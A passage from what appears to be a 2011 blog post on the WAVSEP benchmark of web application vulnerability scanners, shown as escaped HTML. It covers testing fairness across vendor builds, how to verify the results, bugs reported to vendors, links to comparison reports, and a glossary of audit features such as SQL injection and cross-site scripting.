class=&quot;MsoNormal&quot;&gt;I verified that JSky, WebCruiser, and ParosPro didn&#39;t release a new version, tested the latest versions of AppScan, WebInspect, Acunetix, Netsparker, Sandcat and Nessus.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;It made sense that builds that were tested a short while ago (like NTO spider), were also something that I can rely on to represent the currently state of the tool (I hope&lt;span style=&quot;font-family: Wingdings;&quot;&gt;J&lt;/span&gt;).&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I did however, have a problem with Cenzic and Burp, two of the first tools that I tested in this research, since my evaluation licenses were no longer valid, and I couldn&#39;t update the tools to their latest version and scan again, and since I had 2-3 days until the end of my planned schedule, with a million tasks pending, I simply couldn&#39;t afford going through the evaluation request phase again, with all of my good intentions, and the willingness to sacrifice my spare time to ensure these tools will be properly represented.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Even though the results of some updated products (WebInspect and Nessus being the best examples) didn&#39;t change at all, even after I updated them to the latest version, who could say that the result would be the same for other vendors?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;So, were the terms unfair to burp and cenzic?&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Finally, several vendors sent me multiple versions and builds – they all wanted to succeed, a legitimate desire of any human being, even more so for a firm. Apart from the time each test took (a price I was willing to pay at the time), the new builds were sent even in the last day of the benchmark, and afterwards. &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;But if the new version is better, and more accurate, by limiting the amount of tests I perform for a given vendor, isn&#39;t that against what I&#39;m trying to achieve in all my benchmarks, which is to release the benchmark with the most updated results, for all the tools?&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;(For example, Syhunt, a vendor that did very well in the last benchmark, sent me its final build (2.4.2.5) a day after the deadline, and included a time based SQL injection detection feature in that build, but since I couldn&#39;t afford the time anymore, I couldn&#39;t test the build, so, am I really reflecting the tool&#39;s current state in the most accurate manner? But if I would have tested this build, shouldn&#39;t I provide the rest of the vendors the same opportunity?)&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;One of the questions I believe I can answer – the accuracy question.&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;A benchmark is, in a very real sense, a competition, and since I take the scientific approach, I believe that the results are absolute, at least for the subject that is being tested. Since I&#39;m not claiming that one tool is &quot;better&quot; than the other in every category, only at the tested criterion, I believe that priorities do not matter – as long as the test really reflects the current situation, the result is reliable.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I leave the interpretation of the results to the reader, at least until I&#39;ll cover enough aspects of the tools.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;As for the rest of the open issues, I don&#39;t have good answers for all of those questions, and although I did my very best in this benchmark, and even exceeded what I thought I&#39;m capable of, I will probably have to think of some solutions that will make the next benchmark terms equal, even for scanners that were tested in the beginning of the benchmark, and less time consuming then it has been.&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025799&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;11. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Verifying The Benchmark Results&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the benchmark can be verified by replicating the scan methods described in the scan log of each scanner, and by testing the scanner against WAVSEP v1.0.3.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The latest version of WAVSEP can be downloaded from the web site of project WAVSEP (binary/source code distributions, installation instructions and the test case description are provided in the web site download section):&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;http://code.google.com/p/wavsep/&lt;/a&gt;&lt;br /&gt;
&amp;nbsp; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025800&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;12. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Notifications and Clarifications&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;How to use the results of the benchmark&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The results of the benchmark clearly show how accurate each tool is in detecting the tested vulnerabilities (SQL Injection (MySQL ) &amp;amp; Reflected Cross Site Scripting), as long as it is able to locate and scan the vulnerable entry points. The results might even help to &lt;b&gt;estimate&lt;/b&gt; how accurate each tool is in detecting related vulnerabilities (for example SQL Injection vulnerabilities which are based on other databases), and determine which exposure instances &lt;b&gt;cannot be detected&lt;/b&gt; by certain tools; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;However, currently, the results DO NOT evaluate the overall quality of the tool, since they don&#39;t &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; include detailed information on the subjects such as crawling quality, technology support, scoping, profiling, stability in extreme cases, tolerance, detection accuracy of other exposures and so on... at least NOT YET.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;I highly recommend reading the detailed results, and the appendix that deals with web application scanner evaluation, before getting to any conclusions.&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;Additional Notifications&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;During the benchmark, I have reported bugs that had a major affect on the detection accuracy to several commercial and open source vendors:&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;A performance improvement feature in NTOSpider caused it not to scan many POST XSS test cases, and thus, the detection accuracy of RXSS POST test cases was significantly smaller then the RXSS GET detection accuracy. The vendor was notified on this issue, and provided me with a special build that overrides this feature (at least until they will have a feature in the GUI to disable this mechanism).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;A similar performance improvement feature in Netsparker caused the same issue, however, the feature could have been disabled in Netsparker, and thus, with the support of the relevant personal at Netsparker, I was able to work around the problem.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;A few bugs in arachni prevented the blind sql injection diff plugins from working properly. I notified the author, Tasos, on the issue, and he quickly fixed the issue and released the new version.&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;Acunetix RXSS detection result was updated to match the results of the latest free version (one version above the tested commercial version) - Since the tested commercial version of Acunetix was older than the tested free version (20110608 vs 20110711), and since the results of the upgraded free version were actually better than the older commercial version I had tested, I changed the results of the commercial tool to match the ones of the new free version (from 22 to 24 in both the GET &amp;amp; POST RXSS detection scores).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;text-indent: -18pt;&quot;&gt;&lt;span style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font: 7pt &#39;Times New Roman&#39;;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;Changes in results from the previous benchmark might be attributed to enhanced scanning features, and/or to enhanced stability in the test environment &amp;amp; method (connection pool, limited &amp;amp; divided scope).&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025801&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;13. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;List of Tested Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report contains the list of scanners tested in this benchmark, and provides information on the tested version, the tool&#39;s vendor/author and the current status of product:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/List%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025802&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;14. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Source, License and Technical Details of Tested Scanners&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following report compares the licenses, development technology and sources (home page) of the various scanners:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Details%20of%20Tested%20Web%20Application%20Vulnerability%20Scanners%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18pt; text-indent: -18pt;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/post-edit.g?blogID=3792178847867987053&amp;amp;postID=5660944376278622097&quot; name=&quot;_Toc300025803&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;15. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Comparison of Active Vulnerability Detection Features&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/a&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;The following reports compare the active vulnerability detection features (audit features) of the various tested scanners:&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;First Report:&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%201of2%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%201of2%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;i&gt;Second Report:&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;a href=&quot;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%202of2%20-%20WAVSEP%20Benchmark%202011.pdf&quot;&gt;http://sectooladdict-benchmarks.googlecode.com/files/Application%20Active%20Scan%20Features%20Comparison%202of2%20-%20WAVSEP%20Benchmark%202011.pdf&lt;/a&gt; &lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;Aside from the &lt;b&gt;Count&lt;/b&gt; column (which represents the total amount of audit features supported by the tool, not including complementary features such as web server scanning and passive analysis), each column in the report represents an audit feature. The description of each column is presented in the following glossary table:&lt;/div&gt;&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: medium none; margin-left: 5.4pt;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Title&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;background: none repeat scroll 0% 0% rgb(196, 188, 150); border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;&lt;u&gt;Description&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;SQL&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Error Dependant SQL Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;BSQL&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Blind &amp;amp; Intentional Time Delay SQL Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;RXSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Reflected Cross Site Scripting&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;PXSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Persistent / Stored Cross Site Scripting&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;DXSS&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;DOM XSS&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Redirect&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;External Redirect / Phishing via Redirection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Bck&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Backup File Detection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Auth&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Authentication Bypass&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;CRLF&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;CRLF Injection / Response Splitting&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;LDAP&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;LDAP Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;XPath&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;X-Path Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;MX&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;MX / SMTP / IMAP Injection&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;Session Test&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Session Identifier Complexity Analysis&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr&gt;   &lt;td style=&quot;border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 106.35pt;&quot; valign=&quot;top&quot; width=&quot;142&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;&lt;b&gt;SSI&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style=&quot;border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 240.95pt;&quot; valign=&quot;top&quot; width=&quot;321&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;Server Side Include&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
